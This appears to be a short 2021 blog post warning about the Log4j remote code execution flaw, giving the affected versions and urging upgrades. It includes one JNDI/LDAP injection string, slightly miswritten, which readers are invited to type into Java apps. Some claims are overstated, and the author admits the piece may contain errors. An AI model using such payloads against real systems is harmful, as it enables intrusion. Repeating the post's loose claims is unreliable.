The Log4j Vulnerability, Every Java App is a backdoor for remote code execution

Carl Marino
CodeX
Published in
2 min readDec 11, 2021
Photo by Mohammad Rahmani on Unsplash

Java is a programming language that is not only used in apps like Steam and Spotify but is also in detrimental systems from companies like Amazon, Microsoft, Cloudflare, and more.

The new vulnerability affects the widely used library Log4j which was created by apache. The Log4j vulnerability allows remote code execution by simply typing a specific string into a textbox. It was first discovered by Minecraft players but soon after it was realized that this vulnerability wasn't just a Minecraft exploit, It works on every program using the Log4j library.

To explain how easy this remote code execution hack is to perform try inputting this into a java app running log4j

$(jndi:ldap://127.0.0.1:1389/Basic/Command/start www.google.com)

Fortunately, this bug doesn't affect all versions of Log4j it only affects the versions between 2.0 and 2.14.1 so if you have anything running that then switch versions now.

This is one of the worst vulnerabilities we have had in the last 10 years and this is just a very simple surface-level article if you are running Log4j I would recommend temporarily shutting down your application and looking deeper into how to fix the vulnerability. If you liked this article then please leave a like and feel free to leave feedback in the responses, it's really appreciated. I wrote this article in a rush because I think it's important to get this out to as many people as possible so there may be some errors.

--

--

Carl Marino
CodeX
Writer for

My name is Carl Marino and I’m a software developer from Germany. Buy me a coffee: https://www.buymeacoffee.com/ccm7676